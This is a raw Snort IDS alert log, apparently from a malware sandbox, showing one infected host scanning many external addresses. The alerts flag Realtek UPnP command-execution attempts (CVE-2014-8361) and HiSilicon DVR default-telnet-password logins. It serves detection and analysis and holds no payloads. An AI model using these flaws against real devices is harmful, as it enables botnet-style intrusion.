Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33618 -> 91.200.120.129:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55814 -> 91.77.148.18:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55814 -> 91.77.148.18:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55818 -> 91.77.148.18:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56644 -> 45.138.68.86:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56644 -> 45.138.68.86:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43982 -> 45.158.21.156:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43982 -> 45.158.21.156:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34222 -> 45.43.238.154:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34222 -> 45.43.238.154:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56418 -> 45.250.173.40:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56418 -> 45.250.173.40:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43630
Source: Traffic	Snort IDS: 716 INFO TELNET access 12.132.185.90:23 -> 192.168.2.23:35490
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.250.139.253:23 -> 192.168.2.23:35814
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.250.139.253:23 -> 192.168.2.23:35814
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35668 -> 185.225.195.166:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35668 -> 185.225.195.166:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33852 -> 45.127.160.139:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33852 -> 45.127.160.139:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35672 -> 185.225.195.166:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:53222
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43630
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43630
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.132.185.90:23 -> 192.168.2.23:35490
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.132.185.90:23 -> 192.168.2.23:35490
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.249.147.18:23 -> 192.168.2.23:58436
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.249.147.18:23 -> 192.168.2.23:58436
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49114 -> 45.113.2.3:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49114 -> 45.113.2.3:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60430 -> 185.235.180.145:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60430 -> 185.235.180.145:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60422 -> 185.233.80.129:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60422 -> 185.233.80.129:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60440 -> 185.235.180.145:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60432 -> 185.233.80.129:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57980 -> 45.43.239.39:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57980 -> 45.43.239.39:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52530 -> 91.200.120.67:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45416 -> 45.115.241.9:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45416 -> 45.115.241.9:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 64.85.48.118:23 -> 192.168.2.23:33552
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 64.85.48.118:23 -> 192.168.2.23:33552
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:54784 -> 92.180.159.76:23
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43746
Source: Traffic	Snort IDS: 716 INFO TELNET access 12.132.185.90:23 -> 192.168.2.23:35612
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47584 -> 45.41.87.7:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47584 -> 45.41.87.7:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:53350
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43746
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43746
Source: Traffic	Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 185.117.83.97: -> 192.168.2.23:
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.132.185.90:23 -> 192.168.2.23:35612
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.132.185.90:23 -> 192.168.2.23:35612
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 209.166.92.105:23 -> 192.168.2.23:58046
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 209.166.92.105:23 -> 192.168.2.23:58046
Source: Traffic	Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:60820
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44276 -> 45.41.93.96:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44276 -> 45.41.93.96:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38550 -> 45.42.95.76:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38550 -> 45.42.95.76:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38806 -> 185.133.76.118:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38806 -> 185.133.76.118:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44512 -> 91.76.221.44:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44512 -> 91.76.221.44:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38810 -> 185.133.76.118:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44516 -> 91.76.221.44:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43818
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 189.112.111.254:23 -> 192.168.2.23:60820
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.186.40.42:23 -> 192.168.2.23:60836
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.186.40.42:23 -> 192.168.2.23:60836
Source: Traffic	Snort IDS: 716 INFO TELNET access 12.132.185.90:23 -> 192.168.2.23:35694
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:53422
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:35694 -> 12.132.185.90:23
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43818
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43818
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53182 -> 45.158.20.52:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53182 -> 45.158.20.52:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:60900
Source: Traffic	Snort IDS: 716 INFO TELNET access 41.60.156.81:23 -> 192.168.2.23:47878
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:60900 -> 189.112.111.254:23
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.132.185.90:23 -> 192.168.2.23:35694
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.132.185.90:23 -> 192.168.2.23:35694
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:35168 -> 2.196.131.42:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58264 -> 45.152.216.70:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58264 -> 45.152.216.70:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39908 -> 45.195.9.140:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39908 -> 45.195.9.140:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 189.112.111.254:23 -> 192.168.2.23:60900
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58596 -> 45.133.119.108:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58596 -> 45.133.119.108:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58598 -> 45.133.119.108:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:60978
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37414 -> 45.115.237.160:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37414 -> 45.115.237.160:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:53524
Source: Traffic	Snort IDS: 716 INFO TELNET access 12.132.185.90:23 -> 192.168.2.23:35800
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52734 -> 185.242.232.109:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52734 -> 185.242.232.109:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60204 -> 91.77.213.224:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60204 -> 91.77.213.224:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60208 -> 91.77.213.224:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52738 -> 185.242.232.109:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58506 -> 91.76.227.42:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58506 -> 91.76.227.42:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58508 -> 91.76.227.42:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 189.112.111.254:23 -> 192.168.2.23:60978
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.132.185.90:23 -> 192.168.2.23:35800
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.132.185.90:23 -> 192.168.2.23:35800
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:36156 -> 14.250.139.253:23
Source: Traffic	Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:32782
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.250.139.253:23 -> 192.168.2.23:36156
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.250.139.253:23 -> 192.168.2.23:36156
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34670 -> 91.78.78.126:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34670 -> 91.78.78.126:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37990 -> 185.147.57.109:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37990 -> 185.147.57.109:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34680 -> 91.78.78.126:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37994 -> 185.147.57.109:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34742 -> 45.121.57.150:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34742 -> 45.121.57.150:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41400 -> 45.124.201.26:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41400 -> 45.124.201.26:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42850 -> 45.33.242.186:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42850 -> 45.33.242.186:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39702 -> 45.41.93.77:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39702 -> 45.41.93.77:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41416 -> 45.124.201.26:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 189.112.111.254:23 -> 192.168.2.23:32782
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41654 -> 45.42.86.88:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41654 -> 45.42.86.88:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51620 -> 185.142.143.64:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51620 -> 185.142.143.64:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44520 -> 45.250.172.36:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44520 -> 45.250.172.36:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.249.147.18:23 -> 192.168.2.23:58760
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.249.147.18:23 -> 192.168.2.23:58760
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51628 -> 185.142.143.64:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 12.132.185.90:23 -> 192.168.2.23:35908
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39498 -> 91.78.44.126:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39498 -> 91.78.44.126:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 64.85.48.118:23 -> 192.168.2.23:33864
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 64.85.48.118:23 -> 192.168.2.23:33864
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39502 -> 91.78.44.126:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56918 -> 45.254.24.180:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56918 -> 45.254.24.180:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53696 -> 185.114.78.45:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53696 -> 185.114.78.45:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53160 -> 45.42.86.243:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53160 -> 45.42.86.243:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53706 -> 185.114.78.45:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:32888
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33774 -> 185.229.200.212:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33774 -> 185.229.200.212:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45424 -> 91.77.218.117:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45424 -> 91.77.218.117:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49110 -> 45.152.216.217:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49110 -> 45.152.216.217:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45428 -> 91.77.218.117:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33780 -> 185.229.200.212:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49118 -> 45.152.216.217:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.132.185.90:23 -> 192.168.2.23:35908
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.132.185.90:23 -> 192.168.2.23:35908
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 192.24.49.52:23 -> 192.168.2.23:36092
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 192.24.49.52:23 -> 192.168.2.23:36092
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 189.112.111.254:23 -> 192.168.2.23:32888
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 209.166.92.105:23 -> 192.168.2.23:58372
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 209.166.92.105:23 -> 192.168.2.23:58372
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42818 -> 45.134.145.252:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42818 -> 45.134.145.252:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 192.24.49.52:23 -> 192.168.2.23:36100
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 192.24.49.52:23 -> 192.168.2.23:36100
Source: Traffic	Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:32918
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34728 -> 185.65.160.215:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34728 -> 185.65.160.215:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34730 -> 185.65.160.215:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60418 -> 45.116.212.241:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60418 -> 45.116.212.241:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 41.60.156.81:23 -> 192.168.2.23:48138
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 192.24.49.52:23 -> 192.168.2.23:36118
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 192.24.49.52:23 -> 192.168.2.23:36118
Source: Traffic	Snort IDS: 716 INFO TELNET access 12.132.185.90:23 -> 192.168.2.23:35982
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 189.112.111.254:23 -> 192.168.2.23:32918
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48884 -> 91.214.119.42:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48884 -> 91.214.119.42:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48888 -> 91.214.119.42:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44294 -> 45.45.156.148:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44294 -> 45.45.156.148:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44296 -> 45.45.156.148:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58534 -> 45.77.191.125:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58534 -> 45.77.191.125:52869
